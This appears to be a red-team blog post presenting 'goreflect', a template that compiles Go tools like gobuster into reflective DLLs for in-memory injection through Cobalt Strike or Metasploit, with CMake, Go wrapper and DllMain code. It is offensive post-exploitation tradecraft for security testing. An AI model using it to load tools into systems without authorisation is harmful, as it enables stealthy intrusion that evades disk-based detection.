I have released a template project on GitHub that can be used to convert your favorite Go tool and compile it as a reflective DLL. The template is based on gobuster, but the project can be adapted for any Go tool. Currently the project is built using CMake, GCC and of course the Golang compiler. It utilizes the CGO interface within Go, which allows your Go entry point to be called from the reflective DLL's DllMain.

The top level project file, CMakeLists.txt, is the glue for building our reflective DLL. The project adds gobuster as a dependency to our goreflect program, which in turn is linked to our reflective DLL, libgoreflect.

project (goreflect)
#Dependency to add simple Go support to CMake
#Your favorite go tool definition
#Dependency for goreflect to allow parsing of a command line string
#Our Go static library, result is linkable using GCC
                           goreflect.go  # our lightweight wrapper around gobuster
                           gobuster gsq) # everything else is a dependency
#Standard C shared library using metasploit's version of the reflective loader code
add_library(goreflect SHARED "ReflectiveDll.c" "ReflectiveLoader.c" "ReflectiveLoader.h" "ReflectiveDLLInjection.h")
target_include_directories(goreflect PUBLIC ${CMAKE_BINARY_DIR})
#Linking all our dependencies as static, including our go program.  Results in no dependencies
target_link_libraries(goreflect ${CMAKE_BINARY_DIR}/libgoreflect_prog.lib -static-libgcc -static-libstdc++ -static -lpthread )

Our goreflect program is a simple wrapper that exports our CGO function to the C world under the name start, allowing it to be called from our reflective DLL. The arg parameter is then parsed into individual arguments that can be used to call our go program. Now since go does not allow multiple main packages to be declared within a single program, we cannot import or call gobuster's main directly. But luckily most go programs are designed in such a way that the main function is a proxy for the real main inside a separate package. If you find that this is not the case, you may need to replicate some of the main code inside the start function within goreflect.go

package main

import "C"

import (
	"fmt"
	"os"

	gsq ""
)

func main() {
	//not used
}

//export start
func start(arg string) {
	//parse our monolithic argument string into individual args
	args, err := gsq.Split(arg)
	//our first argument is usually the program name, so just fake it
	args = append([]string{"goreflect"}, args...)
	if err == nil {
		//replace os.Args ready for calling our go program
		os.Args = args
		//run our go program
	} else {
		//parsing arguments failed, so bail.  Possibly unterminated string quote, etc...
		fmt.Printf("Failed to parse start arguments, %v\n", err)
	}
}

Our final piece of logic sits inside the ReflectiveDll.c file. This file holds the entry point to our reflective DLL and will call the start function exported from our go program. The DllMain function again is fairly lightweight.

// This is a stub for the actual functionality of the DLL.
#include "ReflectiveLoader.h"
#include <libgoreflect_prog.h>

// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.

// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
extern HINSTANCE hAppInstance;

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
    BOOL bReturnValue = TRUE;
    switch( dwReason )
    {
        case DLL_QUERY_HMODULE:
            if( lpReserved != NULL )
                *(HMODULE *)lpReserved = hAppInstance;
            break;
        case DLL_PROCESS_ATTACH: {
            hAppInstance = hinstDLL;
            GoString goArgs;
            goArgs.p = (char*)lpReserved;
            goArgs.n = strlen((char*)lpReserved);
            start(goArgs);
            break;
        }
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return bReturnValue;
}

Inside the DLL_PROCESS_ATTACH case statement, we convert the lpReserved argument to a GoString object, since this is the type the start function expects as its prototype. The lpReserved parameter is what Cobalt Strike and metasploit use to pass arguments to the reflective DLL.

I have made a quick video below showing goreflect in action. Utilizing the inject program from the ReflectiveDLL project, it demonstrates injecting the libgoreflect.dll into itself along with the arguments to send to our in-memory gobuster.

The code for goreflect can be found on GitHub.

That’s it for now. In part two I’ll cover how we can work around the 1MB limit within Cobalt Strike for reflective loading of our goreflect DLL.